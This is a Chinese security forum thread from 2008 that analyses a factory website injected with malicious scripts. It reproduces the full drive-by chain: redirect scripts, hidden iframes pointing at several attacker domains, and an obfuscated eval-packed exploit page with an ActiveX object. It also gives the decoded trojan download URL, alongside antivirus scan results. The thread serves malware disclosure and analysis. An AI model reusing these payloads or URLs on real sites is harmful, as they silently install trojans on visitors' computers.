众邦立体光栅材料厂被挂网马

显示全部楼层 · 发表于 2008-5-17 14:57:08

众邦立体光栅材料厂(hxxp://www.xtsptg.com）被插入恶意代码:
[script]hxxp://cnzz.zyns.com/stat.js?id=4265203&web_id=4265203&show=pic
[frame]hxxp://ca.winvv.com/cn.htm

－－－－－

第一个 hXXp___cnzz.zyns.com_stat.js_id=4265203&web_id=4265203&show=pic.js内容如下

<html>
<head>
<META http-equiv=Pragma content=no-cache>
<META http-equiv=Cache-Control content=no-cache>
<META http-equiv=Expires content=0>
<script Language="javascript">
var strArray = "hXXp://220.165.9.233:2080/response.asp?MT=";
t = strArray + window.location.hostname.replace(/\./g," ");
document.location.href = t;
</script>
</head>
<body>
</body>
</html>

－－－－－

hXXp://220.165.9.233:2080/response.asp?MT 内容如下：

<html>
<head>
<META http-equiv=Pragma content=no-cache>
<META http-equiv=Cache-Control content=no-cache>
<META http-equiv=Expires content=0>
<script language="Javascript">
rnd.today=new Date();
rnd.seed=rnd.today.getTime();
function rnd() {
   rnd.seed = (rnd.seed*9301+49297) % 233280;
   return rnd.seed/(233280.0);
};
function rand(number) {
   return Math.ceil(rnd()*number);
};

function jump(){

strArray = "hXXp://www.wipa68.com/cuolian.htm?id=310006&url=";
try{
   var $url = window.location.href;
   } catch(e){
      var $url = window.top.location.href;
   }

var $start = $url.indexOf('MT=')+3;
if ($start > 3) {
   var $Query_String = $url.substring($start, $url.length);
   var $Get_List = $Query_String.split('&');
   t = strArray + $Get_List[0]+"&id="+rnd()*100000000000000000000;
}
else {
   t = strArray + window.location.hostname+"&id="+rnd()*100000000000000000000;
}
document.location.href = t;
}
</script>
</head>
<body>
<script language="Javascript">
var counterURL="hXXp://220.165.9.235:2080/nxdomain233.css"
counterURL=counterURL+"."+rnd()*100000000000000000000;
document.write("<iframe width=0 height=0 frameborder=0 scrolling=auto src="+counterURL+"></iframe>");

setTimeout("jump()",100);

</script>
</body>
</html>

－－－－－

－－－－－

第二个 hxxp://ca.winvv.com/cn.htm 内容如下

<iframe src=hXXp://jjj.hfb86.cn/w6.htm width=100 height=0></iframe>
<iframe src=hXXp://www.fast800.cn/shan.htm width=0 height=0></iframe>
<iframe src="hXXp://ca.winvv.com/ie.htm" width=0 height=0></iframe>
<iframe src="hXXp://czz.aeaer.com/c.htm" width=0 height=0></iframe>

－－－－－

其中 hXXp://jjj.hfb86.cn/w6.htm 内容如下

<html>
<head>
<script language="JavaScript" defer>
eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+c+'\\b','g'),k[c])}}return p}('33(38.62(47,42,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,42,47,13,10,1,0,17,4,24,16,11,17,32,21,20,2,4,15,40,41,29,22,8,18,32,14,20,2,9,9,4,11,12,2,49,61,0,17,2,14,4,8,25,2,40,34,37,0,57,48,57,48,37,0,54,48,57,48,37,0,49,55,2,3,37,0,54,52,53,2,37,0,51,48,8,49,37,0,48,48,48,48,34,43,34,37,0,48,53,48,48,37,0,48,56,48,48,37,0,48,48,48,48,37,0,1,56,56,3,37,0,48,48,3,57,37,0,48,48,48,52,37,0,1,51,48,48,37,0,1,1,8,52,37,0,2,56,2,48,34,43,34,37,0,1,1,2,52,37,0,1,1,1,1,37,0,8,49,54,52,37,0,48,48,51,48,37,0,48,48,48,48,37,0,52,48,56,3,37,0,56,3,48,4,37,0,49,4,55,48,37,0,56,3,8,12,34,43,34,37,0,48,56,55,48,37,0,2,4,56,49,37,0,48,50,48,48,37,0,48,48,48,48,37,0,2,4,56,3,37,0,2,56,3,3,37,0,48,50,48,1,37,0,56,3,48,48,37,0,56,53,48,51,34,43,34,37,0,48,1,4,48,37,0,3,3,56,53,37,0,48,48,48,48,37,0,1,1,48,48,37,0,2,57,48,51,37,0,48,50,50,49,37,0,48,48,48,48,37,0,56,57,53,3,37,0,50,48,53,12,34,43,34,37,0,54,56,53,54,37,0,1,2,57,56,37,0,48,2,56,8,37,0,3,49,2,56,37,0,48,48,48,48,37,0,56,57,48,48,37,0,48,4,52,53,37,0,54,56,53,54,37,0,52,2,56,2,34,43,34,37,0,2,4,48,2,37,0,8,51,2,56,37,0,48,48,48,48,37,0,56,57,48,48,37,0,48,52,52,53,37,0,54,56,53,54,37,0,55,57,4,49,37,0,3,56,2,53,37,0,57,53,2,56,34,43,34,37,0,48,48,48,48,37,0,56,57,48,48,37,0,49,4,52,53,37,0,54,56,53,54,37,0,4,54,49,3,37,0,55,57,52,54,37,0,56,55,2,56,37,0,48,48,48,48,37,0,56,57,48,48,34,43,34,37,0,49,48,52,53,37,0,54,56,53,54,37,0,1,4,8,8,37,0,55,4,48,12,37,0,55,57,2,56,37,0,48,48,48,48,37,0,56,57,48,48,37,0,48,56,52,53,37,0,54,56,53,54,34,43,34,37,0,56,52,2,55,37,0,3,52,54,57,37,0,54,3,2,56,37,0,48,48,48,48,37,0,56,57,48,48,37,0,49,52,52,53,37,0,2,48,3,3,37,0,48,50,48,1,37,0,56,57,48,48,34,43,34,37,0,51,51,48,51,37,0,4,55,1,54,37,0,50,56,52,53,37,0,53,50,53,53,37,0,52,12,52,4,37,0,52,53,4,55,37,0,52,1,50,4,37,0,48,48,52,2,37,0,56,12,48,48,34,43,34,37,0,50,56,53,12,37,0,1,1,53,51,37,0,48,52,53,53,37,0,54,56,53,48,37,0,49,8,51,54,37,0,55,48,50,1,37,0,51,1,2,56,37,0,48,48,48,48,37,0,56,57,48,48,34,43,34,37,0,50,52,52,53,37,0,55,1,54,8,37,0,53,12,56,12,37,0,53,51,50,56,37,0,53,53,1,1,37,0,4,55,49,4,37,0,48,53,52,52,37,0,53,4,50,56,37,0,54,53,50,2,34,43,34,37,0,4,55,55,56,37,0,48,53,52,52,37,0,54,53,50,4,37,0,48,48,48,48,37,0,53,54,48,48,37,0,56,12,53,54,37,0,50,56,55,12,37,0,1,1,53,55,37,0,50,48,55,53,34,43,34,37,0,1,1,53,54,37,0,50,52,53,53,37,0,53,55,53,54,37,0,53,53,1,1,37,0,2,56,48,4,37,0,48,48,54,50,37,0,48,48,48,48,37,0,4,52,56,49,37,0,48,50,48,48,34,43,34,37,0,48,48,48,48,37,0,51,51,54,49,37,0,4,50,4,48,37,0,48,48,48,52,37,0,56,3,53,53,37,0,53,49,2,4,37,0,56,3,53,51,37,0,48,56,55,12,37,0,53,12,56,3,34,43,34,37,0,53,54,48,4,37,0,55,51,56,3,37,0,56,3,51,4,37,0,49,2,55,52,37,0,48,51,55,56,37,0,53,54,1,51,37,0,55,54,56,3,37,0,48,51,50,48,37,0,51,51,1,51,34,43,34,37,0,52,57,4,57,37,0,8,12,52,49,37,0,4,51,48,51,37,0,51,51,53,54,37,0,48,1,1,54,37,0,49,48,3,2,37,0,1,50,51,8,37,0,48,56,55,52,37,0,4,2,4,49,34,43,34,37,0,48,51,48,12,37,0,52,48,1,50,37,0,1,49,2,3,37,0,1,2,51,3,37,0,55,53,53,2,37,0,53,8,2,53,37,0,2,3,56,3,37,0,53,8,56,3,37,0,48,51,50,52,34,43,34,37,0,54,54,12,12,37,0,48,4,56,3,37,0,56,3,52,3,37,0,49,4,53,8,37,0,12,12,48,51,37,0,48,52,56,3,37,0,48,51,56,3,37,0,53,2,4,53,37,0,53,57,53,3,34,43,34,37,0,4,50,53,12,37,0,48,48,48,56,37,0,57,50,2,57,37,0,48,48,48,48,37,0,53,2,48,48,37,0,56,48,3,1,37,0,48,50,48,4,37,0,3,57,48,48,37,0,48,49,48,48,34,43,34,37,0,48,48,48,48,37,0,8,52,1,51,37,0,2,4,56,49,37,0,48,49,48,48,37,0,48,48,48,48,37,0,1,4,56,3,37,0,4,55,56,51,37,0,4,55,49,48,37,0,54,2,48,55,34,43,34,37,0,54,52,55,52,37,0,4,55,54,4,37,0,48,52,52,55,37,0,48,48,54,4,37,0,48,48,48,48,37,0,1,1,53,55,37,0,48,52,53,53,37,0,52,53,56,57,37,0,4,55,50,52,34,43,34,37,0,53,50,48,55,37,0,54,4,55,52,37,0,4,55,52,49,37,0,48,52,52,55,37,0,54,4,54,4,37,0,54,51,54,1,37,0,52,55,4,55,37,0,54,49,48,56,37,0,54,53,55,52,34,43,34,37,0,4,55,52,56,37,0,48,4,52,55,37,0,54,49,54,53,37,0,48,48,55,48,37,0,53,48,53,55,37,0,53,53,1,1,37,0,56,3,48,56,37,0,3,56,1,48,37,0,48,1,2,52,34,43,34,37,0,48,48,48,50,37,0,51,48,56,57,37,0,48,55,4,55,37,0,55,51,54,12,37,0,54,51,55,54,37,0,52,55,4,55,37,0,55,50,48,52,37,0,48,48,55,52,37,0,53,55,48,48,34,43,34,37,0,53,53,1,1,37,0,56,3,48,52,37,0,51,4,52,56,37,0,56,4,56,3,37,0,56,48,48,56,37,0,48,48,48,48,37,0,51,57,48,48,37,0,48,56,51,52,37,0,48,52,55,52,34,43,34,37,0,1,57,2,50,37,0,49,50,2,3,37,0,51,52,56,12,37,0,53,53,48,56,37,0,52,48,54,8,37,0,48,52,54,8,37,0,1,1,53,54,37,0,49,48,53,53,37,0,48,54,4,55,34,43,34,37,0,48,4,56,48,37,0,48,48,48,50,37,0,4,52,56,49,37,0,48,49,48,48,37,0,48,48,48,48,37,0,2,56,4,51,37,0,1,1,54,57,37,0,1,1,1,1,37,0,48,52,56,3,34,43,34,37,0,53,51,50,52,37,0,53,50,53,49,37,0,53,55,53,54,37,0,2,4,3,57,37,0,48,50,48,1,37,0,56,3,48,48,37,0,56,53,49,57,37,0,55,53,12,3,37,0,51,51,53,48,34,43,34,37,0,51,51,4,57,37,0,56,51,12,3,37,0,48,54,2,56,37,0,3,55,48,1,37,0,56,49,49,56,37,0,1,1,1,3,37,0,48,48,49,53,37,0,55,53,48,48,37,0,56,51,51,2,34,43,34,37,0,48,54,2,56,37,0,3,55,48,1,37,0,56,49,49,56,37,0,1,1,1,3,37,0,48,48,51,53,37,0,55,53,48,48,37,0,56,51,51,48,37,0,48,50,2,56,37,0,3,55,48,1,34,43,34,37,0,56,51,49,56,37,0,54,8,1,3,37,0,50,53,55,53,37,0,4,48,56,51,37,0,56,3,48,52,37,0,3,56,51,48,37,0,48,1,2,48,37,0,48,48,48,50,37,0,48,48,54,56,34,43,34,37,0,48,48,48,48,37,0,54,56,48,49,37,0,49,48,48,48,37,0,48,48,48,48,37,0,48,48,54,8,37,0,49,48,1,1,37,0,48,54,56,57,37,0,52,52,56,57,37,0,49,56,50,52,34,43,34,37,0,2,4,3,57,37,0,48,50,48,1,37,0,1,1,48,48,37,0,53,1,48,49,37,0,53,8,53,2,37,0,53,3,53,57,37,0,2,52,3,56,37,0,48,50,48,1,37,0,1,1,48,48,34,43,34,37,0,2,56,50,48,37,0,1,12,12,8,37,0,1,1,1,1,34,43,34,37,0,55,52,54,56,37,0,55,48,55,52,37,0,50,1,51,8,37,0,54,50,50,1,37,0,55,51,50,2,37,0,51,48,51,49,37,0,50,12,51,50,37,0,54,2,54,51,37,0,55,8,55,8,37,0,54,51,50,2,37,0,54,12,54,1,37,0,51,48,50,1,37,0,54,4,55,50,37,0,54,53,50,2,37,0,54,53,55,56,37,0,48,48,48,48,34,41,59,22,8,18,32,3,16,19,3,9,11,4,15,61,0,17,2,14,4,8,25,2,40,34,37,0,48,21,48,21,37,0,48,21,48,21,34,41,59,22,8,18,32,20,2,8,12,2,18,14,16,30,2,61,50,48,59,22,8,18,32,14,9,8,4,15,14,25,8,4,2,61,20,2,8,12,2,18,14,16,30,2,43,14,20,2,9,9,4,11,12,2,49,46,9,2,17,19,24,20,59,27,20,16,9,2,40,3,16,19,3,9,11,4,15,46,9,2,17,19,24,20,60,14,9,8,4,15,14,25,8,4,2,41,3,16,19,3,9,11,4,15,43,61,3,16,19,3,9,11,4,15,59,22,8,18,32,1,16,9,9,3,9,11,4,15,61,3,16,19,3,9,11,4,15,46,14,0,3,14,24,18,16,17,19,40,48,44,14,9,8,4,15,14,25,8,4,2,41,59,22,8,18,32,3,9,11,4,15,61,3,16,19,3,9,11,4,15,46,14,0,3,14,24,18,16,17,19,40,48,44,3,16,19,3,9,11,4,15,46,9,2,17,19,24,20,45,14,9,8,4,15,14,25,8,4,2,41,59,27,20,16,9,2,40,3,9,11,4,15,46,9,2,17,19,24,20,43,14,9,8,4,15,14,25,8,4,2,60,48,63,52,48,48,48,48,41,3,9,11,4,15,61,3,9,11,4,15,43,3,9,11,4,15,43,1,16,9,9,3,9,11,4,15,59,22,8,18,32,23,2,23,11,18,28,61,17,2,27,32,36,18,18,8,28,40,41,59,1,11,18,40,16,61,48,59,16,60,52,48,48,59,16,43,43,41,29,23,2,23,11,18,28,35,16,58,61,3,9,11,4,15,43,14,20,2,9,9,4,11,12,2,49,31,22,8,18,32,3,0,1,61,39,39,59,27,20,16,9,2,40,3,0,1,46,9,2,17,19,24,20,60,51,50,41,3,0,1,61,3,0,1,43,0,17,2,14,4,8,25,2,40,34,37,48,21,34,41,59,22,8,18,32,23,61,39,39,59,23,61,11,3,26,46,21,11,17,14,11,9,2,59,11,3,26,46,21,11,17,14,11,9,2,61,3,0,1,59,11,3,26,46,21,11,17,14,11,9,2,61,23,59,23,61,11,3,26,46,21,11,17,14,11,9,2,59,11,3,26,46,21,11,17,14,11,9,2,61,3,0,1,59,11,3,26,46,21,11,17,14,11,9,2,61,23,31))',10,64,'117|102|101|98|99|33410|23383|21333|97|108||111|100||115|107|105|110|114|103|104|67|118|109|116|112|106|119|121|123|122|125||eval||91|65||String||||||||||||||||||||93||||fromCharCode|120'.split('|')))

</script>
</head>
<body onload="JavaScript: return Check();">
<object classid="clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93" id="obj">
Unable to create object
</object>
</body>
</html>

<iframe src="hXXp://yuerhj905687hjerklgf.cn/new/cc.htm" width=100 height=1></iframe>
<iframe src="hXXp://yuerhj905687hjerklgf.cn/new/c1.htm" width=1 height=1></iframe>

<script language="javascript" src="hXXp://ww4.tongji123.com/t1.aspx?id=44206085"></script>

<script src='http://s90.cnzz.com/stat.php?id=880299&web_id=880299' language='JavaScript' charset='gb2312'></script>

<script language="javascript" type="text/javascript" src="hXXp://js.users.51.la/1876325.js"></script>

－－－－－

hXXp://www.fast800.cn/shan.htm 内容如下

<html>
<body>
<SCRIPT LANGUAGE="javascript" TYPE="text/javascript">var cookieString=document.cookie;var start=cookieString.indexOf("cookiesleep");if(start!=-1){}else{var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie="cookiesleep=test;expires="+expires.toGMTString();document.write("<iframe width=50 height=0 src=ad/vip.htm></iframe>");}</SCRIPT>
<script language="javascript" type="text/javascript" src="hXXp://js.users.51.la/1660620.js"></script>
</body>
</html>
[/qoute]
－－－－－

hXXp://ca.winvv.com/ie.htm 内容如下
[quote]
<iframe src="hXXp://www.kekg888.cn/web/6619038.htm" width=100 height=0></iframe>
<iframe src=hXXp://www.usaicac.cn/5519.htm width=100 height=0></iframe>

－－－－－

hXXp://czz.aeaer.com/c.htm 内容如下

<iframe src=hXXp://cc.benchi999.com/one/huai5.htm width=2 height=2></iframe>

－－－－

[ 本帖最后由没注册于 2008-5-17 14:59 编辑 ]

显示全部楼层 · 发表于 2008-5-17 15:02:33

第一个打不开~

第二个：

显示全部楼层 · 发表于 2008-5-17 15:03:24

貌似这里就我一个在用诺顿扫！

显示全部楼层 · 发表于 2008-5-17 15:08:00

Starting the file scan:

Begin scan in 'E:\AV\c.htm'
Begin scan in 'E:\AV\ie.htm'
E:\AV\ie.htm
   [DETECTION] Contains suspicious code HEUR/HTML.Malware
   [NOTE]    The fund was classified as suspicious.
   [NOTE]    The file was moved to '485c8534.qua'!
Begin scan in 'E:\AV\shan.htm'
Begin scan in 'E:\AV\cn.htm'
E:\AV\cn.htm
   [DETECTION] Contains detection pattern of the HTML script virus HTML/Infected.WebPage.Gen
   [NOTE]    The file was deleted!
Begin scan in 'E:\AV\w6.htm'
E:\AV\w6.htm
   [DETECTION] Contains suspicious code HEUR/HTML.Malware
   [NOTE]    The fund was classified as suspicious.
   [NOTE]    The file was moved to '485c8505.qua'!
Begin scan in 'E:\AV\cc.htm'
Begin scan in 'E:\AV\c1.htm'
Begin scan in 'E:\AV\huai5.htm'

End of the scan: 2008年5月17日  15:10
Used time: 00:11 min

The scan has been done completely.

   0 Scanning directories
   8 Files were scanned
   1 viruses and/or unwanted programs were found
   2 Files were classified as suspicious:
   1 files were deleted
   0 files were repaired
   2 files were moved to quarantine
   0 files were renamed
   0 Files cannot be scanned
   7 Files not concerned
   0 Archives were scanned
   0 Warnings
   3 Notes

显示全部楼层 · 发表于 2008-5-17 15:32:52

那个eval(function(p,a,c,k,e,d)解后

http://b.s102-cnzz.com/0rl.exe

显示全部楼层 · 发表于 2008-5-17 16:19:09

显示全部楼层 · 发表于 2008-5-17 17:01:34

和昨天某网挂的差不多。

显示全部楼层 · 发表于 2008-5-17 17:07:15

2008-5-17 17:06:47 HTTP 过滤器文件 http://b.s102-cnzz.com/0rl.exe 可能是 Win32/Genetik 特洛伊木马的变种连接中断 - 已隔离 Computer\*** 通过应用程序访问 web 时检测到威胁: D:\Maxthon\Maxthon.exe.

显示全部楼层 · 发表于 2008-5-17 18:40:02

Trojan.Agent.ltt.unvq

显示全部楼层 · 发表于 2008-5-17 18:57:48

广西电信"在线防毒墙 "友情提醒：
访问该网站可能危害你的计算机！

* 返回上页
* 临时允许访问该站点
* 永久允许访问该站点
* 关闭窗口

感谢：瑞星趋势提供部分技术支持

[已鉴定] 众邦立体光栅材料厂被挂网马

回复 1楼没注册的帖子

[已鉴定] 众邦立体光栅材料厂被挂网马

回复 1楼 没注册 的帖子

回复 1楼没注册的帖子